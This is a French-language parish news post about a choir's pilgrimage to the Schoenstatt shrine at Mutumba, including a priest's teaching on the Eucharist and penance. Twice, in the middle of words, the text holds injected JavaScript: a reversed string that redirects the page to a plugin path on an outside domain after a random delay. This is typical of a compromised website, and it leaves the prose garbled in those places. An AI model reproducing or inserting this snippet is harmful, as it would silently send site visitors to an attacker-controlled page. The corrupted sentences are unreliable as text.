Chorale Saint Martin de Mont Sion Gikungu en pèlerinage au Sanctuaire marial de Schoenstatt de Mutumba

Le samedi 17 novembre 2018, la Chorale Saint Martin du Sanctuaire marial de Schoenstatt Mont Sion Gikungu a effectué un pèlerinage vers le Sanctuaire marial de Schoenstatt de Mutumba. Cette Chorale était accompagnée par le Père Félicien NIMBONA, Recteur du Sanctuaire de Mont Sion.

Père Félicien Nimbona lors de l’enseignement sur l’eucharistie et la pénitence

Arrivés à Mutumba, ils ont été accueilli par les Soeurs de Marie de Schoenstatt de Mutumba. Après une petite présentation du Sanctuaire de Mutumba par ces sœurs, ils ont fait une petite prière. A suivi alors un enseignement sur « l’eucharistie et la pénitence » qui a été dispensé par le Père Félicien NIMBONA. Dans cet enseignement, le Père Félicien a parlé des grâces que nous recevons à partir de l’eucharistie :

  • L’eucharistie fortifie les relations que nous avons avec Dieu ;

  • Elle nous écarte du péché ;

  • Elle fortifie l’amour en nous et nous réconforte ;

  • Elle nous aide à nous rassembler dans le Christ ;

  • Elle nous aide à nous rapprocher des pauvres.

Mais, Père Félicien a dit qu’il faut réconcilier avec Dieu avant de communier. « Le péché nous écarte du Seigneur. Le péché est le manque de liberté spirituelle. Par introspection, il nous faut d’abord la reconnaissance du péché pour pouvoir s’en débarrasser. Le mot « igicumuro » (péché) serait lié au mot « icumu » (lance), pour dire que chaque fois que nous péchons, nous nous présentons comme le soldat qui a transpercé Jésus sur la croix. »

Il a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné l’exemple de Zaché qui a dû grimper sur l’arbre pour pouvoir s’approcher et voir le Seigneur. « La pénitence nécessite alors l’humilité, la reconnaissance du peché. Il est tout ce qui nous écarte de Dieu : l’adultère, le vol, l’injustice, les mensonges, le meurtre, des paroles blessantes, les avortements provoqués, le non-respect des parents et des autres, etc. » conclut le Père Félicien.

Après cet enseignement, ce pèlerinage a été clôturé par un moment d’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration et de confession avant une messe d’action de grâce. Ils sont arrivés à Mont Sion Gikungu vers 18h00 et ils étaient dans une joie totale.

Propos recueillis de la part du Dr Oscar NIYONZIMA

par Jean de Dieu NIYONKURU

Laisser un commentaire